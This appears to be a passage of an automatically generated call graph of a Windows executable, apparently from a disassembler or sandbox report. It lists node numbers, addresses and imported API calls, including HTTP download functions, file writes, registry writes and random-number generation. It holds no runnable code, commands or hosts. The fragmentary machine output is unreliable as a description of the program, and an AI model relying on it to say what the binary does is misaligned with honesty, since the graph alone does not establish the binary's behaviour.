9805->9807 9808 7ff6f18ab50d ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@ 9805->9808 9806->9805 9810 7ff6f18ab4a5 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 9806->9810 9807->9533 9807->9534 9808->9807 9809->9804 9809->9805 9810->9805 9810->9806 9812 7ff6f18cdeca malloc 9811->9812 9813 7ff6f18a7b1f 9812->9813 9814 7ff6f18cdebb 9812->9814 9813->9506 9813->9520 9814->9812 9815 7ff6f18cdeda 9814->9815 9816 7ff6f18cdee5 9815->9816 10722 7ff6f18ce9a4 9815->10722 9818 7ff6f18a1420 Concurrency::cancel_current_task __std_exception_copy 9816->9818 9819 7ff6f18cdeeb 9818->9819 9821 7ff6f18cdfbc free 9820->9821 9826 7ff6f18ad346 ?good@ios_base@std@ 9823->9826 9825 7ff6f18ad37f 9828 7ff6f18ad395 ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12 ?good@ios_base@std@ 9825->9828 9833 7ff6f18ad3ad 9825->9833 9826->9825 9826->9833 9827 7ff6f18ad407 ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J 9831 7ff6f18ad3b7 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N ?uncaught_exceptions@std@ 9827->9831 9836 7ff6f18ad3f7 9827->9836 9828->9833 9830 7ff6f18ad3db ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 9830->9833 9830->9836 9832 7ff6f18ad491 ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@ 9831->9832 9835 7ff6f18a7dbf ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 9831->9835 9832->9835 9833->9827 9833->9830 9833->9831 9834 7ff6f18ad429 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 9834->9831 9834->9836 9835->9542 9836->9831 9836->9834 9838 7ff6f18ab370 9 API calls 9837->9838 9839 7ff6f18a5f93 9838->9839 9840 7ff6f18ad310 9 API calls 9839->9840 9841 7ff6f18a5fac 9840->9841 9842 7ff6f18ab370 9 API calls 9841->9842 9843 7ff6f18a5fbb 9842->9843 9844 7ff6f18ad310 9 API calls 9843->9844 9845 7ff6f18a5fd4 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z InternetOpenW 9844->9845 9846 7ff6f18a6065 9845->9846 9847 7ff6f18a6009 9845->9847 9850 7ff6f18ab590 5 API calls 9846->9850 9848 7ff6f18ab370 9 API calls 9847->9848 9849 7ff6f18a601c GetLastError ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 9848->9849 9851 7ff6f18abf80 7 API calls 9849->9851 9852 7ff6f18a608b InternetCrackUrlW 9850->9852 9853 7ff6f18a6060 9851->9853 9854 7ff6f18a61d2 InternetConnectW 9852->9854 9855 7ff6f18a6104 9852->9855 9859 7ff6f18cdbf0 Concurrency::wait 8 API calls 9853->9859 9856 7ff6f18a6214 HttpOpenRequestW 9854->9856 9857 7ff6f18a6208 9854->9857 9858 7ff6f18ab370 9 API calls 9855->9858 9860 7ff6f18a629f 9856->9860 9861 7ff6f18a625a 9856->9861 9857->9856 9862 7ff6f18a6117 GetLastError ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z InternetCloseHandle 9858->9862 9863 7ff6f18a61b7 9859->9863 9867 7ff6f18ab590 5 API calls 9860->9867 9864 7ff6f18ab370 9 API calls 9861->9864 9865 7ff6f18abf80 7 API calls 9862->9865 9863->9568 9866 7ff6f18a626d GetLastError ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z InternetCloseHandle 9864->9866 9897 7ff6f18a6164 9865->9897 9866->9860 9869 7ff6f18a62c5 HttpSendRequestW 9867->9869 9868 7ff6f18a61a0 9871 7ff6f18cdfc4 ISource free 9868->9871 9872 7ff6f18a63c5 InternetReadFile 9869->9872 9873 7ff6f18a62fb 9869->9873 9870 7ff6f18a6561 _invalid_parameter_noinfo_noreturn 9875 7ff6f18a6568 9870->9875 9871->9853 9874 7ff6f18a6452 InternetCloseHandle InternetCloseHandle InternetCloseHandle 9872->9874 9886 7ff6f18a63f7 9872->9886 9876 7ff6f18ab370 9 API calls 9873->9876 9877 7ff6f18ab370 9 API calls 9874->9877 9878 7ff6f18cdd18 8 API calls 9875->9878 9879 7ff6f18a630e 6 API calls 9876->9879 9882 7ff6f18a6480 9877->9882 9880 7ff6f18a656d memset 9878->9880 9881 7ff6f18abf80 7 API calls 9879->9881 9883 7ff6f18a65c5 9880->9883 9884 7ff6f18a636d 9881->9884 9885 7ff6f18ad310 9 API calls 9882->9885 10726 7ff6f18ac8b0 ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA ??0?$basic_istream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@ ?_Fiopen@std@@YAPEAU_iobuf@@PEB_WHH 9883->10726 9887 7ff6f18a63ae 9884->9887 9893 7ff6f18a6500 _invalid_parameter_noinfo_noreturn 9884->9893 9894 7ff6f18cdfc4 ISource free 9884->9894 9889 7ff6f18a649a ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 9885->9889 9886->9874 9886->9875 9886->9886 9892 7ff6f18aada0 Concurrency::wait memmove 9886->9892 9887->9872 9891 7ff6f18a64d3 9889->9891 9889->9897 9891->9893 9896 7ff6f18a6507 9891->9896 9898 7ff6f18a6437 InternetReadFile 9892->9898 9893->9896 9894->9887 9895 7ff6f18a2190 22 API calls 9899 7ff6f18a662b 9895->9899 9900 7ff6f18cdfc4 ISource free 9896->9900 9897->9853 9897->9868 9897->9870 9898->9874 9898->9886 9901 7ff6f18aada0 Concurrency::wait memmove 9899->9901 9900->9897 9902 7ff6f18a6641 9901->9902 10735 7ff6f18aa960 ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@ ?_Fiopen@std@@YAPEAU_iobuf@@PEBDHH 9902->10735 9905 7ff6f18a670d 9906 7ff6f18a6768 ??7ios_base@std@ 9905->9906 9908 7ff6f18a675b 9905->9908 9913 7ff6f18a6754 _invalid_parameter_noinfo_noreturn 9905->9913 9909 7ff6f18a6bf8 9906->9909 9910 7ff6f18a6798 ??7ios_base@std@ 9906->9910 9907 7ff6f18a6708 9912 7ff6f18cdfc4 ISource free 9907->9912 9914 7ff6f18cdfc4 ISource free 9908->9914 9915 7ff6f18ab370 9 API calls 9909->9915 9910->9909 9916 7ff6f18a67bd 9910->9916 9911 7ff6f18a6701 _invalid_parameter_noinfo_noreturn 9911->9907 9912->9905 9913->9908 9917 7ff6f18a6760 9914->9917 9918 7ff6f18a6c0b 9915->9918 9919 7ff6f18cdeb0 std::_Facet_Register 3 API calls 9916->9919 9917->9906 10819 7ff6f18ab6e0 9918->10819 9921 7ff6f18a67e2 9919->9921 9923 7ff6f18a6bf1 _invalid_parameter_noinfo_noreturn 9921->9923 9924 7ff6f18a67eb memset 9921->9924 9923->9909 9926 7ff6f18a6876 ?read@?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@PEAD_J ??Bios_base@std@ 9924->9926 9925 7ff6f18a6d20 std::bad_exception::bad_exception 15 API calls 9927 7ff6f18a6c34 9925->9927 9928 7ff6f18a68c4 9926->9928 9930 7ff6f18a6c60 15 API calls 9927->9930 9928->9926 9929 7ff6f18aada0 Concurrency::wait memmove 9928->9929 9931 7ff6f18a68cd 9928->9931 9929->9928 9932 7ff6f18a6b8a 9930->9932 9933 7ff6f18abf80 7 API calls 9931->9933 9934 7ff6f18cdbf0 Concurrency::wait 8 API calls 9932->9934 9935 7ff6f18a690b 9933->9935 9936 7ff6f18a6b9b 9934->9936 10744 7ff6f18a5350 9935->10744 9936->9568 9939 7ff6f18aac50 std::bad_exception::bad_exception 12 API calls 9940 7ff6f18a6966 9939->9940 9941 7ff6f18a6990 9940->9941 9942 7ff6f18a696b ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N 9940->9942 9943 7ff6f18aac50 std::bad_exception::bad_exception 12 API calls 9941->9943 9942->9941 9944 7ff6f18a699d 9943->9944 9945 7ff6f18a69a2 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N 9944->9945 9946 7ff6f18a69c7 9944->9946 9945->9946 10789 7ff6f18cd958 9946->10789 9949 7ff6f18a6c47 9951 7ff6f18a2de0 52 API calls 9949->9951 9950 7ff6f18a69e8 9952 7ff6f18a6a2e 9950->9952 9954 7ff6f18a6a29 9950->9954 9957 7ff6f18a6a22 _invalid_parameter_noinfo_noreturn 9950->9957 9953 7ff6f18a6c5a 9951->9953 9955 7ff6f18a6a8d 9952->9955 9959 7ff6f18a6a88 9952->9959 9962 7ff6f18a6a81 _invalid_parameter_noinfo_noreturn 9952->9962 9958 7ff6f18cdfc4 ISource free 9954->9958 9956 7ff6f18a6af7 9955->9956 9960 7ff6f18a6af2 9955->9960 9964 7ff6f18a6aeb _invalid_parameter_noinfo_noreturn 9955->9964 9956->9923 9961 7ff6f18a6b53 9956->9961 9966 7ff6f18a6b4e 9956->9966 9957->9954 9958->9952 9963 7ff6f18cdfc4 ISource free 9959->9963 9965 7ff6f18cdfc4 ISource free 9960->9965 9967 7ff6f18a6d20 std::bad_exception::bad_exception 15 API calls 9961->9967 9962->9959 9963->9955 9964->9960 9965->9956 9968 7ff6f18cdfc4 ISource free 9966->9968 9969 7ff6f18a6b7c 9967->9969 9968->9961 10815 7ff6f18a6c60 9969->10815 9972 7ff6f18ab5cf 9971->9972 9973 7ff6f18a82e3 RegSetValueExW RegCloseKey 9971->9973 9974 7ff6f18ab6c5 9972->9974 9978 7ff6f18ab5e5 9972->9978 9973->9625 9973->9626 11018 7ff6f18a14c0 ?_Xlength_error@std@@YAXPEBD 9974->11018 9976 7ff6f18ab6ca 9979 7ff6f18a1420 Concurrency::cancel_current_task __std_exception_copy 9976->9979 9977 7ff6f18ab66f 9982 7ff6f18cdeb0 std::_Facet_Register 3 API calls 9977->9982 9978->9973 9978->9976 9978->9977 9980 7ff6f18ab621 9978->9980 9981 7ff6f18ab6d0 9979->9981 9983 7ff6f18cdeb0 std::_Facet_Register 3 API calls 9980->9983 9982->9973 9984 7ff6f18ab629 9983->9984 9984->9973 9985 7ff6f18ab668 _invalid_parameter_noinfo_noreturn 9984->9985 9985->9977 9987 7ff6f18a7712 9986->9987 9987->9987 9988 7ff6f18abf80 7 API calls 9987->9988 9989 7ff6f18a7725 9988->9989 9990 7ff6f18aada0 Concurrency::wait memmove 9989->9990 9991 7ff6f18a773d 9990->9991 9992 7ff6f18a77b0 memset 9991->9992 9993 7ff6f18a77ab 9991->9993 9995 7ff6f18a77a4 _invalid_parameter_noinfo_noreturn 9991->9995 9994 7ff6f18aa960 29 API calls 9992->9994 9996 7ff6f18cdfc4 ISource free 9993->9996 9997 7ff6f18a77f6 ??Bios_base@std@ 9994->9997 9995->9993 9996->9992 9998 7ff6f18a78b1 free 9997->9998 9999 7ff6f18a7839 9997->9999 10001 7ff6f18a6d20 std::bad_exception::bad_exception 15 API calls 9998->10001 10000 7ff6f18ab370 9 API calls 9999->10000 10003 7ff6f18a784a 10000->10003 10002 7ff6f18a78c7 10001->10002 10004 7ff6f18a7909 10002->10004 10006 7ff6f18a7904 10002->10006 10008 7ff6f18a78fd _invalid_parameter_noinfo_noreturn 10002->10008 10005 7ff6f18ab370 9 API calls 10003->10005 10007 7ff6f18cdbf0 Concurrency::wait 8 API calls 10004->10007 10010 7ff6f18a785b 10005->10010 10009 7ff6f18cdfc4 ISource free 10006->10009 10011 7ff6f18a7918 10007->10011 10008->10006 10009->10004 10012 7ff6f18ad310 9 API calls 10010->10012 10011->9636 10013 7ff6f18a7874 10012->10013 10014 7ff6f18ab370 9 API calls 10013->10014 10015 7ff6f18a7883 10014->10015 10016 7ff6f18aac50 std::bad_exception::bad_exception 12 API calls 10015->10016 10017 7ff6f18a788d 10016->10017 10017->9998 10018 7ff6f18a7892 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N 10017->10018 10018->9998 10020 7ff6f18cdeb0 std::_Facet_Register 3 API calls 10019->10020 10021 7ff6f18add39 _beginthreadex 10020->10021 10022 7ff6f18add71 10021->10022 10023 7ff6f18add89 ?_Throw_Cpp_error@std@@YAXH 10021->10023 10024 7ff6f18cdbf0 Concurrency::wait 8 API calls 10022->10024 10025 7ff6f18adda8 10023->10025 10026 7ff6f18add7e 10024->10026 10025->9647 10026->9647 10028 7ff6f18ad30a 10027->10028 11019 7ff6f18aced0 ?_Xlength_error@std@@YAXPEBD 10028->11019 10031 7ff6f18a8663 10030->10031 10032 7ff6f18cd2d7 AreFileApisANSI 10030->10032 10033 7ff6f18a1cb0 10031->10033 10032->10031 10034 7ff6f18a1dd0 10033->10034 10035 7ff6f18a1d02 10033->10035 10046 7ff6f18ab010 10034->10046 10036 7ff6f18a1df1 10035->10036 11020 7ff6f18cd2ec MultiByteToWideChar 10035->11020 10037 7ff6f18a18c0 13 API calls 10036->10037 10039 7ff6f18a1df7 10037->10039 10040 7ff6f18a1ba0 12 API calls 10039->10040 10041 7ff6f18a1e03 10040->10041 10042 7ff6f18a1d22 10042->10039 10043 7ff6f18cd2ec __std_fs_convert_narrow_to_wide 2 API calls 10042->10043 10044 7ff6f18a1dc5 10043->10044 10044->10034 10045 7ff6f18a1ba0 12 API calls 10044->10045 10045->10036 11023 7ff6f18a2370 10046->11023 10048 7ff6f18ab04d 11040 7ff6f18a2fc0 10048->11040 10052 7ff6f18cdeb0 std::_Facet_Register 3 API calls 10054 7ff6f18ab0b8 10052->10054 11065 7ff6f18a33b0 10054->11065 10055 7ff6f18ab17c 10058 7ff6f18cdbf0 Concurrency::wait 8 API calls 10055->10058 10057 7ff6f18ab177 10060 7ff6f18cdfc4 ISource free 10057->10060 10061 7ff6f18a869e 10058->10061 10059 7ff6f18ab170 _invalid_parameter_noinfo_noreturn 10059->10057 10060->10055 10061->9536 10061->9657 10062 7ff6f18ab0ef 11079 7ff6f18cd544 10062->11079 10064 7ff6f18a2ef0 10063->10064 10068 7ff6f18a2e84 10063->10068 10066 7ff6f18cd5d8 31 API calls 10064->10066 10065 7ff6f18cdbf0 Concurrency::wait 8 API calls 10067 7ff6f18a2fab 10065->10067 10066->10068 10067->9672 10068->10065 10070 7ff6f18a21ba 10069->10070 10071 7ff6f18cd2c4 __std_fs_code_page 2 API calls 10070->10071 10072 7ff6f18a21c6 10071->10072 10073 7ff6f18a224b 10072->10073 10075 7ff6f18cd334 __std_fs_convert_wide_to_narrow 5 API calls 10072->10075 10085 7ff6f18a226a 10072->10085 10073->9672 10074 7ff6f18a18c0 13 API calls 10076 7ff6f18a2270 10074->10076 10077 7ff6f18a2208 10075->10077 10078 7ff6f18a1ba0 12 API calls 10076->10078 10077->10076 10079 7ff6f18aad10 memset 10077->10079 10080 7ff6f18a227c 10078->10080 10081 7ff6f18a2221 10079->10081 10082 7ff6f18cd334 __std_fs_convert_wide_to_narrow 5 API calls 10081->10082 10083 7ff6f18a2240 10082->10083 10083->10073 10084 7ff6f18a1ba0 12 API calls 10083->10084 10084->10085 10085->10074 10087 7ff6f18a6e29 10086->10087 10088 7ff6f18cd2c4 __std_fs_code_page 2 API calls 10087->10088 10089 7ff6f18a6e41 10088->10089 10090 7ff6f18a1cb0 16 API calls 10089->10090 10091 7ff6f18a6e66 10090->10091 11222 7ff6f18ab1b0 10091->11222 10094 7ff6f18a7344 10096 7ff6f18a2de0 52 API calls 10094->10096 10095 7ff6f18a6e8d 10098 7ff6f18a6ecd 10095->10098 10099 7ff6f18a6ec6 _invalid_parameter_noinfo_noreturn 10095->10099 10120 7ff6f18a6ed2 10095->10120 10097 7ff6f18a7357 10096->10097 10101 7ff6f18a2de0 52 API calls 10097->10101 10100 7ff6f18cdfc4 ISource free 10098->10100 10099->10098 10100->10120 10102 7ff6f18a7368 10101->10102 10104 7ff6f18a2cf0 35 API calls 10102->10104 10103 7ff6f18a7291 10109 7ff6f18cdbf0 Concurrency::wait 8 API calls 10103->10109 10106 7ff6f18a7377 10104->10106 10105 7ff6f18a2e50 31 API calls 10105->10120 10107 7ff6f18a73c5 10106->10107 10110 7ff6f18a73dd _invalid_parameter_noinfo_noreturn 10106->10110 10111 7ff6f18a73bd 10106->10111 10107->9672 10108 7ff6f18a2190 22 API calls 10108->10120 10113 7ff6f18a7331 10109->10113 10112 7ff6f18cdfc4 ISource free 10111->10112 10112->10107 10113->9672 10115 7ff6f18cdeb0 std::_Facet_Register 3 API calls 10115->10120 10116 7ff6f18a2370 6 API calls 10116->10120 10117 7ff6f18a70fa _invalid_parameter_noinfo_noreturn 10117->10120 10118 7ff6f18cdfc4 free ISource 10118->10120 10120->10097 10120->10102 10120->10103 10120->10105 10120->10108 10120->10115 10120->10116 10120->10117 10120->10118 10121 7ff6f18a7066 memchr 10120->10121 10122 7ff6f18a7234 _invalid_parameter_noinfo_noreturn 10120->10122 11239 7ff6f18a4ff0 _Mtx_lock 10120->11239 11256 7ff6f18a3550 10120->11256 10121->10120 10122->10120 10124 7ff6f18cd532 10123->10124 10125 7ff6f18cd539 GetLastError 10123->10125 10124->9672 10127 7ff6f18a3262 10126->10127 10128 7ff6f18acf10 3 API calls 10127->10128 10132 7ff6f18a32b4 10128->10132 10129 7ff6f18a33a5 11330 7ff6f18aaea0 ?_Xout_of_range@std@@YAXPEBD 10129->11330 10130 7ff6f18a3327 10133 7ff6f18a1f30 18 API calls 10130->10133 10132->10129 10132->10130 10134 7ff6f18a334a 10133->10134 10136 7ff6f18a3390 10134->10136 10138 7ff6f18a338b 10134->10138 10141 7ff6f18a3384 _invalid_parameter_noinfo_noreturn 10134->10141 10136->9672 10143 7ff6f18cdfc4 ISource free 10138->10143 10141->10138 10143->10136 10153 7ff6f18a4e99 10152->10153 10154 7ff6f18a4fdb ?_Throw_Cpp_error@std@@YAXH 10152->10154 10155 7ff6f18a4ea6 ?_Throw_Cpp_error@std@@YAXH 10153->10155 10156 7ff6f18a4eba _Mtx_unlock _Cnd_broadcast 10153->10156 10155->10156 10157 7ff6f18a4f29 _Cnd_destroy_in_situ 10156->10157 10164 7ff6f18a4ee4 10156->10164 11331 7ff6f18a9ae0 10157->11331 10158 7ff6f18a4eee _Thrd_id 10158->10154 10161 7ff6f18a4efd _Thrd_join 10158->10161 10159 7ff6f18a4fc1 ?_Throw_Cpp_error@std@@YAXH 10162 7ff6f18a4fcd terminate 10159->10162 10163 7ff6f18a4fb5 ?_Throw_Cpp_error@std@@YAXH 10161->10163 10161->10164 10165 7ff6f18a4fd4 _invalid_parameter_noinfo_noreturn 10162->10165 10163->10159 10164->10157 10164->10158 10164->10159 10165->10154 10166 7ff6f18a4f93 10166->9670 10167 7ff6f18a4f62 10167->10165 10168 7ff6f18a4f8b 10167->10168 10170 7ff6f18cdfc4 ISource free 10168->10170 10169 7ff6f18a4f3f 10169->10162 10169->10166 10169->10167 10170->10166 10172 7ff6f18cdbf9 10171->10172 10173 7ff6f18a8ba8 10172->10173 10174 7ff6f18cdc44 IsProcessorFeaturePresent 10172->10174 10173->9486 10175 7ff6f18cdc5c 10174->10175 11366 7ff6f18cde3c RtlCaptureContext 10175->11366 10182 7ff6f18a142e Concurrency::cancel_current_task 10181->10182 10183 7ff6f18a143f __std_exception_copy 10182->10183 10183->9513 10186 7ff6f18a2df9 10185->10186 10187 7ff6f18aa250 7 API calls 10186->10187 10188 7ff6f18a2e0e 10187->10188 11371 7ff6f18a2610 10188->11371 10192 7ff6f18a2d04 10191->10192 10193 7ff6f18aa250 7 API calls 10192->10193 10194 7ff6f18a2d19 10193->10194 11482 7ff6f18a24a0 10194->11482 10197 7ff6f18a2370 6 API calls 10198 7ff6f18a2dac 10197->10198 10199 7ff6f18a2370 6 API calls 10198->10199 10200 7ff6f18a2dba 10199->10200 10201 7ff6f18aa290 std::bad_exception::bad_exception 22 API calls 10200->10201 10202 7ff6f18a2dc8 10201->10202 10203 7ff6f18ab860 ??0_Lockit@std@@QEAA@H ??Bid@locale@std@ 10202->10203 10204 7ff6f18ab8c2 10203->10204 10205 7ff6f18ab937 ??1_Lockit@std@@QEAA 10204->10205 10207 7ff6f18ab8d9 ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12 10204->10207 10208 7ff6f18ab8e5 10204->10208 10206 7ff6f18cdbf0 Concurrency::wait 8 API calls 10205->10206 10209 7ff6f18a8c35 ?always_noconv@codecvt_base@std@ 10206->10209 10207->10208 10208->10205 10210 7ff6f18ab8fc ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@ 10208->10210 10209->9589 10209->9590 10211 7ff6f18ab910 10210->10211 10212 7ff6f18ab967 10210->10212 11497 7ff6f18cdb84 10211->11497 11500 7ff6f18a1c10 10212->11500 10215 7ff6f18ab96c 10219 7ff6f18aa2be 10218->10219 10220 7ff6f18aa2d4 10219->10220 10221 7ff6f18aa399 10219->10221 10222 7ff6f18aa2da 10220->10222 10224 7ff6f18aa39e 10220->10224 10225 7ff6f18aa30a 10220->10225 10226 7ff6f18aa36e memmove 10220->10226 10229 7ff6f18aa369 10220->10229 10240 7ff6f18a14c0 ?_Xlength_error@std@@YAXPEBD 10221->10240 10222->9706 10227 7ff6f18a1420 Concurrency::cancel_current_task __std_exception_copy 10224->10227 10228 7ff6f18cdeb0 std::_Facet_Register 3 API calls 10225->10228 10226->9706 10230 7ff6f18aa3a4 10227->10230 10231 7ff6f18aa320 10228->10231 10232 7ff6f18cdeb0 std::_Facet_Register 3 API calls 10229->10232 10241 7ff6f18a6d20 10230->10241 10234 7ff6f18aa362 _invalid_parameter_noinfo_noreturn 10231->10234 10235 7ff6f18aa328 10231->10235 10232->10226 10234->10229 10235->10226 10242 7ff6f18a6d76 10241->10242 10243 7ff6f18a6db3 ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 10242->10243 10245 7ff6f18aac50 10242->10245 10246 7ff6f18aacc5 10245->10246 10247 7ff6f18aac67 10245->10247 10248 7ff6f18aacc7 ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 10246->10248 10251 7ff6f18aab60 10247->10251 10248->10243 10250 7ff6f18aaca1 fclose 10250->10248 10252 7ff6f18aac33 10251->10252 10253 7ff6f18aab83 10251->10253 10254 7ff6f18cdbf0 Concurrency::wait 8 API calls 10252->10254 10253->10252 10255 7ff6f18aab8d 10253->10255 10256 7ff6f18aac42 10254->10256 10257 7ff6f18aabd1 10255->10257 10258 7ff6f18aaba6 ?unshift@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEAD1AEAPEAD 10255->10258 10256->10250 10260 7ff6f18cdbf0 Concurrency::wait 8 API calls 10257->10260 10259 7ff6f18aabcc 10258->10259 10259->10257 10261 7ff6f18aac07 fwrite 10259->10261 10262 7ff6f18aabee 10260->10262 10261->10257 10262->10250 10300 7ff6f18b0440 10263->10300 10265 7ff6f18b952c 10266 7ff6f18cdeb0 std::_Facet_Register 3 API calls 10265->10266 10267 7ff6f18b958a 10266->10267 10268 7ff6f18b95c6 memset memset 10267->10268 10269 7ff6f18b0440 27 API calls 10267->10269 10268->9744 10271 7ff6f18b95a2 10269->10271 10317 7ff6f18afac0 10271->10317 10274 7ff6f18b7ac0 10273->10274 10275 7ff6f18b7ac4 10273->10275 10277 7ff6f18b0440 27 API calls 10274->10277 10371 7ff6f18b8a50 malloc 10275->10371 10278 7ff6f18b7ae0 10277->10278 10353 7ff6f18b73f0 10278->10353 10280 7ff6f18b7b1e BCryptGenRandom 10281 7ff6f18b7b37 10280->10281 10290 7ff6f18b7af6 10280->10290 10283 7ff6f18b7b46 BCryptCloseAlgorithmProvider 10281->10283 10284 7ff6f18b7b4d 10281->10284 10283->10284 10288 7ff6f18b7b75 10284->10288 10289 7ff6f18b7b62 free 10284->10289 10285 7ff6f18b7ba4 SetLastError 10287 7ff6f18aa250 7 API calls 10285->10287 10286 7ff6f18b73f0 51 API calls 10286->10290 10291 7ff6f18b7bbd 10287->10291 10293 7ff6f18cdbf0 Concurrency::wait 8 API calls 10288->10293 10289->10288 10290->10280 10290->10285 10290->10286 10366 7ff6f18ce660 AcquireSRWLockExclusive 10290->10366 10419 7ff6f18ce5f4 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 10290->10419 10378 7ff6f18b7500 GetLastError 10291->10378 10295 7ff6f18b7b85 10293->10295 10295->9747 10497 7ff6f18b11d0 10297->10497 10301 7ff6f18b0487 10300->10301 10304 7ff6f18b0462 10300->10304 10302 7ff6f18cdbf0 Concurrency::wait 8 API calls 10301->10302 10303 7ff6f18b049a 10302->10303 10303->10265 10304->10301 10305 7ff6f18b04d6 10304->10305 10306 7ff6f18b04a3 10304->10306 10307 7ff6f18aa250 7 API calls 10305->10307 10332 7ff6f18aa250 10306->10332 10309 7ff6f18b04e7 10307->10309 10312 7ff6f18b0ae0 22 API calls 10309->10312 10314 7ff6f18b04f7 _CxxThrowException 10312->10314 10339 7ff6f18b0590 10314->10339 10318 7ff6f18afae8 10317->10318 10319 7ff6f18afb2c 10317->10319 10321 7ff6f18afb07 10318->10321 10322 7ff6f18afaed 10318->10322 10320 7ff6f18aa250 7 API calls 10319->10320 10324 7ff6f18afb3d 10320->10324 10343 7ff6f18b89c0 _aligned_malloc 10321->10343 10325 7ff6f18cdbf0 Concurrency::wait 8 API calls 10322->10325 10350 7ff6f18a3a90 10324->10350 10328 7ff6f18afaff 10325->10328 10328->10268 10329 7ff6f18cdbf0 Concurrency::wait 8 API calls 10331 7ff6f18afb24 10329->10331 10331->10268 10333 7ff6f18aa270 10332->10333 10333->10333 10334 7ff6f18abf80 7 API calls 10333->10334 10335 7ff6f18aa27e 10334->10335 10336 7ff6f18b0ae0 10335->10336 10337 7ff6f18aa290 std::bad_exception::bad_exception 22 API calls 10336->10337 10338 7ff6f18b04c4 _CxxThrowException 10337->10338 10338->10305 10340 7ff6f18b05c2 10339->10340 10341 7ff6f18aa290 std::bad_exception::bad_exception 22 API calls 10340->10341 10342 7ff6f18b051e 10341->10342 10342->10265 10344 7ff6f18afb14 10343->10344 10345 7ff6f18b89dd 10343->10345 10344->10329 10346 7ff6f18b89ef ?set_new_handler@std@@YAP6AXXZP6AXXZ 10345->10346 10347 7ff6f18b8a17 Concurrency::cancel_current_task 10345->10347 10348 7ff6f18b89f9 _aligned_malloc 10346->10348 10349 7ff6f18b8a21 _CxxThrowException 10347->10349 10348->10344 10348->10345 10351 7ff6f18aa290 std::bad_exception::bad_exception 22 API calls 10350->10351 10352 7ff6f18a3abe _CxxThrowException 10351->10352 10354 7ff6f18b742b 10353->10354 10355 7ff6f18b742f 10354->10355 10356 7ff6f18b744b 10354->10356 10357 7ff6f18cdbf0 Concurrency::wait 8 API calls 10355->10357 10359 7ff6f18b7452 SetLastError 10356->10359 10358 7ff6f18b7442 10357->10358 10358->10290 10360 7ff6f18aa250 7 API calls 10359->10360 10361 7ff6f18b746b 10360->10361 10362 7ff6f18b7500 45 API calls 10361->10362 10363 7ff6f18b747b _CxxThrowException __std_exception_copy 10362->10363 10364 7ff6f18aa290 std::bad_exception::bad_exception 22 API calls 10363->10364 10365 7ff6f18b74e0 10364->10365 10365->10290 10367 7ff6f18ce676 10366->10367 10368 7ff6f18ce67b ReleaseSRWLockExclusive 10367->10368 10370 7ff6f18ce680 SleepConditionVariableSRW 10367->10370 10370->10367 10372 7ff6f18b8a8f 10371->10372 10373 7ff6f18b8a68 ?set_new_handler@std@@YAP6AXXZP6AXXZ 10371->10373 10372->10274 10374 7ff6f18b8a77 ?set_new_handler@std@@YAP6AXXZP6AXXZ 10373->10374 10375 7ff6f18b8a9a Concurrency::cancel_current_task 10373->10375 10376 7ff6f18b8a81 malloc 10374->10376 10377 7ff6f18b8aa4 _CxxThrowException 10375->10377 10376->10372 10376->10373 10420 7ff6f18affd0 10378->10420 10381 7ff6f18b7561 10434 7ff6f18acdb0 10381->10434 10382 7ff6f18b7874 10493 7ff6f18a14c0 ?_Xlength_error@std@@YAXPEBD 10382->10493 10386 7ff6f18b7598 10387 7ff6f18b75e4 10386->10387 10388 7ff6f18b75ad memmove 10386->10388 10447 7ff6f18ae090 10387->10447 10389 7ff6f18b7605 10388->10389 10391 7ff6f18b764a 10389->10391 10392 7ff6f18ae090 Concurrency::wait 10 API calls 10389->10392 10467 7ff6f18b0240 10391->10467 10392->10391 10395 7ff6f18aa290 std::bad_exception::bad_exception 22 API calls 10397 7ff6f18b76ed 10395->10397 